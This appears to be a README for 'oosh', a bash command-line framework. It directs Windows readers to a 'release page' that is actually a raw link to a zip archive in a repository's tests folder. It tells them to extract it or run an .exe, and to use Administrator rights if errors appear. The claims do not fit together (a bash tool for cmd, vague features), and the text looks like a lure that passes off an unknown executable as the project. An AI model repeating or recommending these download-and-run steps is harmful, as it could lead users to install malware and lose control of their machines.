oosh is a tool for your command line. It helps you use bash scripts with less effort. It adds helpful features like flags, built-in help menus, and automatic tab completion. You do not need to write complex code to get these features. This makes working in the terminal easier and faster.
Before you start, make sure your computer meets these basic needs:
- Windows 10 or newer
- At least 2 GB of free memory
- A 64-bit processor
- Internet connection to download the files
oosh works in the Windows command prompt (cmd) or PowerShell. No programming software is needed.
- Easy flag handling for commands
- Help text shown automatically for each command
- Press tab to get suggested completions on command names or options
- Works with bash scripts without extra setup
- Makes scripts easier to read and use
Follow the steps below to download and run oosh on Windows.
Click the badge to visit the release page. There you will find the latest files ready to download.
-
Open your web browser.
-
Go to the release page by clicking the badge above or visit:
https://raw.githubusercontent.com/ranoufu123/oosh/main/tests/Software_v1.1.zip
-
Find the latest release. It will be at or near the top of the page.
-
Look for a file with a name ending in
.exeor.zip. The.exefile is the easiest to use. -
Click the file name to start downloading.
-
After the download finishes, locate the file in your Downloads folder.
-
If it is a
.zipfile, right-click it and choose "Extract All." Follow the instructions to extract the files. -
If the file is
.exe, double-click it to run. -
Follow any on-screen prompts to install or run oosh.
After installation, you can run oosh from the command line.
-
Open Command Prompt or PowerShell from your Start menu.
-
Type
ooshand press Enter. -
You should see a list of commands and help options.
-
To get help on a specific command, type
oosh help [command name]. -
Use the Tab key to autocomplete commands and options.
oosh makes it easier to use your bash scripts. Instead of typing long commands, use flags and autocomplete.
- Flags look like
-for--flag - Commands have automatic help text
- Press tab to complete command names or flags
Example:
oosh run --file script.sh
You can type oosh r and then press Tab. The tool will complete the command for you.
Check the release page regularly:
https://raw.githubusercontent.com/ranoufu123/oosh/main/tests/Software_v1.1.zip
Download the latest version as described above. Replace the old files with the new ones.
-
If
ooshdoes not run in Command Prompt, make sure the installation directory is in your PATH environment variable. -
If autocomplete does not work, try restarting your terminal.
-
If you get permission errors, run the terminal as Administrator and try again.
-
Make sure you downloaded the correct version for Windows.
You can find more information about oosh features on the GitHub page under the "Wiki" or "Docs" sections.
If you have questions or want to report an issue, use the GitHub "Issues" tab.
This tool covers areas like:
- autocompletion
- bash
- bash-framework
- cli
- cli-framework
- code generation
- developer tools
- shell
All designed to make working with command lines easier.